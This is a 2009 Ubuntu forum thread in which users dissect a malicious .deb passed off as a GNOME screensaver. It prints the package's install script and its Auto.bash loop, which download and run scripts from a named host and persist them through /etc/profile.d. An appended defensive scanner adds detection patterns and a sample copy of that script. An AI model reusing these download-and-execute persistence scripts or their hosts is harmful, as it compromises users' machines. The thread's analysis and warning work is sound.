#1 |
|
A Carafe of Ubuntu
![]() Join Date: Dec 2007
Beans: 107
|
Hello guys, I'm going to make this brief.

I have installed a deb from a site claiming to be a screensaver; however, it looked dodgy; however, I proceeded. After I looked into the source I found MYSTERIOUS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below) (also no screensaver was ever shown in gnome-screensaver)

```
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
```

I'm no expert but this looks just wrong!! I have removed the package; however, I doubt this has done much good...

Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

This all just literally happened in the last few minutes and I'm afraid to reboot my computer.. Should I reinstall my gnome packages? Or was I just being paranoid? I'm thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

Sorry for sounding strange, just trying to fix this A.S.A.P. Thank you for any suggestions.

Last edited by dmizer; December 8th, 2009 at 08:06 PM. Reason: removed hyperlinking to malicious urls
|
|
|
|
#2 |
|
First Cup of Ubuntu
![]() Join Date: Dec 2009
Beans: 3
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
Excuse my noobishness, but it appears that the DEB replaced those two files and changed the permission level to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked though.
|
|
|
|
|
#3 |
|
Dipped in Ubuntu
![]() Join Date: Jul 2009
Location: Dayton Ohio USA
Beans: 607
Ubuntu 9.10 Karmic Koala
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
What is the link (URL) for this alleged screensaver?
Please, not as a hyperlink but plain text.
|
|
|
|
#4 |
|
Iced Blended Vanilla Crème Ubuntu
![]() Join Date: Dec 2007
Location: The last place I look
My beans are hidden!
Ubuntu 9.10 Karmic Koala
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
Definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I'm not seeing it do much. For instance the bash replacement seems to just ping a site "mmowned.com" or some such.
|
|
|
|
|
#5 |
|
Quad Shot of Ubuntu
![]() Join Date: Dec 2007
Location: Gainesville, FL
Beans: 416
Ubuntu 10.04 Lucid Lynx
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
This is the contents of the Auto.bash script.
Code:
```
while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done
```
gnome.sh runs Auto.bash

Also you can whois mmowned.com and complain to the hosting company. Interesting, I just looked up the hosting company and they advertise protection against DOS attacks.

Last edited by pbrane; December 8th, 2009 at 02:54 PM.
|
|
|
|
#6 | |
|
Way Too Much Ubuntu
![]() Join Date: Jul 2007
Beans: 293
Ubuntu 10.04 Lucid Lynx
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
Quote:
ping -s 65507 www.mmowned.com which may happen every time you log in - plus it seems designed to keep what it can run updated. There's a php file involved too, but I cannot figure out what part that has to play. I think you may have just been PWNED.
__________________
http://www.imbjr.com |
|
|
|
|
|
#7 |
|
A Carafe of Ubuntu
![]() Join Date: Dec 2007
Beans: 107
|
OK guys, please help me remove this file from gnome-look. I have browsed the source codes and it contains something definitely malicious:
http://www.gnome-look.org/content/sh...content=116772

Please don't install it. I'm working on contacting others who have installed it and redirecting them here to resolve the issue.

Last edited by conorsulli; December 8th, 2009 at 11:27 PM.
|
|
|
|
#8 |
|
A Carafe of Ubuntu
![]() Join Date: Dec 2007
Beans: 107
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
yes noticed this after further looking...
gonna get this guy good
|
|
|
|
#9 |
|
5 Cups of Ubuntu
![]() Join Date: Oct 2009
Location: North Carolina US
Beans: 30
Ubuntu 9.10 Karmic Koala
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!
__________________
Another day has passed and I'm just a little bit smarter. |
|
|
|
|
#10 |
|
A Carafe of Ubuntu
![]() Join Date: Dec 2009
Beans: 114
Ubuntu 9.10 Karmic Koala
|
Re: YOU THERE!! Malicious script installed as a DEB, please read!
No, you're right. Whatever goes into /etc/profile.d gets run every time someone logs in. It then downloads another script and runs that. Right now, it is just
ping -s 65507 www.mmowned.com
which could at least be used to collect IPs, if this person is also responsible for mmowned.com. Since this script could be replaced with something else at any time, it could easily be used to use your computer to assist in a "Denial of Service" attack. I'm not an expert on stuff like that either, but it certainly is not an innocent thing to do. As you guess, it probably is intended to be forgotten quickly as just "not working".
__________________
(\ /) (O.o) (> <) This is Bunny. Copy Bunny into your signature to help him on his way to world domination.
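
As an added example (not part of any post in this thread): a shell function that triages a package's maintainer script for the pattern discussed above, namely a network fetch, a write into /etc/profile.d, and a world-writable chmod. The sample postinst is constructed from the script quoted in post #1 with the host replaced by a placeholder; `scan_maintainer_script` and `sample_postinst` are hypothetical names.

```shell
#!/bin/bash
# Added example (not from the thread): triage a Debian maintainer script
# for the download-and-persist pattern seen in the postinst from post #1.

# scan_maintainer_script FILE
# Prints "LINE:TAG:TEXT" for each finding; returns 0 if anything was
# flagged and 1 if nothing matched.
scan_maintainer_script() {
    awk '
        function flag(tag) { printf "%d:%s:%s\n", NR, tag, $0; hits++ }
        /^[ \t]*#/ { next }                              # comments, shebang
        (" " $0) ~ /[^A-Za-z0-9_](wget|curl)[ \t]/ { flag("network-fetch") }
        /\/etc\/profile\.d/ { flag("login-persistence") }
        # octal modes only: last digit 2, 3, 6 or 7 has the other-write bit
        ($0 " ") ~ /chmod[ \t]+(-[A-Za-z]+[ \t]+)*[0-7]*[2367][ \t]/ { flag("world-writable") }
        END { exit (hits > 0 ? 0 : 1) }
    ' "$1"
}

# Constructed sample modelled on the postinst quoted in post #1
# (host replaced with a placeholder).
sample_postinst() {
    cat <<'EOF'
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://example.invalid/Bots/Auto.bash
chmod 777 Auto.bash
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://example.invalid/Bots/gnome.sh
chmod 777 gnome.sh
exit
EOF
}

tmp=$(mktemp)
sample_postinst > "$tmp"
scan_maintainer_script "$tmp" && echo "suspicious: review before installing"
rm -f "$tmp"
```

For a real package, `dpkg-deb -e package.deb DIR` unpacks the control scripts (preinst, postinst, prerm, postrm) into DIR without installing anything, so each can be scanned first.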